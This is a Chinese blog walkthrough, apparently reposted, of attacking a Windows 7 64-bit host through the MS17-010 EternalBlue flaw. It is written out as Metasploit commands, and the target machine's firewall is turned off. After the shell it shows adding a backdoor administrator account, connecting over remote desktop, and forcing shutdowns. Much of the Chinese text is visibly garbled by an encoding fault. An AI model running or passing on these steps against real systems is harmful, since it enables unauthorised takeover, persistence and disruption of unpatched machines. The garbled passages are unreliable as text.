利用MS17-010渗透win7(64位)
這里是接著之前一篇"利用MS17-010滲透win7(32位)"的姊妹篇,想了解win7(32位)如何利用永恒之藍(lán)滲透的請(qǐng)點(diǎn)擊利用MS17-010滲透win7(32位)
Win7x64的滲透,我們就可以不用下載利用模塊了,kali里已經(jīng)幫你集成好了 我這里的攻擊機(jī)(192.168.1.222),靶機(jī)(192.168.1.111),記得靶機(jī)關(guān)閉防火墻滲透流程
權(quán)限提升利用
滲透流程:
1.運(yùn)行postgresql 數(shù)據(jù)庫(kù)
root@kali:~# service postgresql start2.打開(kāi)msf
root@kali:~# msfconsole3.掃描靶機(jī)系統(tǒng)是否存在漏洞
- 使用模塊:
- 查看配置信息:
- 設(shè)置目標(biāo)IP
- 進(jìn)行掃描:
發(fā)現(xiàn)目標(biāo)系統(tǒng)存在“永恒之藍(lán)”漏洞
3.搜索ms17-010漏洞利用模塊
msf > search ms17-0104.use模塊
msf > use exploit/windows/smb/ms17_010_eternalblue5.查看需要配置的信息
msf exploit(windows/smb/ms17_010_eternalblue) > show options6.set 靶機(jī)(rhost) IP,這里不需要使用反彈shell模塊
msf exploit(windows/smb/ms17_010_eternalblue) > set rhost 192.168.1.1117.exploit或run,成功拿到shell
msf exploit(windows/smb/ms17_010_eternalblue) > exploit權(quán)限提升利用:
(1)創(chuàng)建用戶,加至管理組
C:\Windows\system32>net user 1stPeak 123456 /add C:\Windows\system32>net localgroup administrators 1stPeak /add我們?nèi)グ袡C(jī)上看看:
(2)打開(kāi)遠(yuǎn)程桌面服務(wù)
(3)使用添加的管理員賬戶1stPeak進(jìn)行遠(yuǎn)程桌面
root@kali:~# rdesktop 192.168.1.111:3389- 比較麻煩的是遠(yuǎn)程桌面,必須要當(dāng)前登陸用戶同意或者默認(rèn)不選擇30s才可以
- 我想過(guò)關(guān)閉UAC,但是無(wú)效
沒(méi)有找到cmd命令開(kāi)啟多用戶連接遠(yuǎn)程桌面,因此,遠(yuǎn)程桌面利用條件也只有:
(1)對(duì)方?jīng)]有看到自己桌面被連接信息
(2)對(duì)方已經(jīng)使用可以多個(gè)用戶同時(shí)登陸遠(yuǎn)程桌面
補(bǔ)充一下開(kāi)啟多個(gè)用戶登陸遠(yuǎn)程桌面的簡(jiǎn)單方法:
打開(kāi)本地組策略編輯器,依次展開(kāi) 【計(jì)算機(jī)配置】-【管理模板】-【W(wǎng)indows組件】-【遠(yuǎn)程桌面服務(wù)】-【遠(yuǎn)程桌面會(huì)話主機(jī)】-【連接】-【標(biāo)準(zhǔn)】雙擊【限制連接的數(shù)量】(4)如果你單純想露一手,就關(guān)機(jī)或者重啟吧(目前這個(gè)看運(yùn)氣,有一定幾率會(huì)出現(xiàn)執(zhí)行失敗)
60s后關(guān)機(jī) shutdown -s -t 6060s后重啟 shutdown -r -t 60取消關(guān)機(jī)或重啟 shutdown -a總結(jié)
以上是生活随笔為你收集整理的利用MS17-010渗透win7(64位)的全部?jī)?nèi)容,希望文章能夠幫你解決所遇到的問(wèn)題。
- 上一篇: 消息称《圣剑传说》游戏将登陆 Xbox
- 下一篇: XSS挑战赛--Writeup(共16题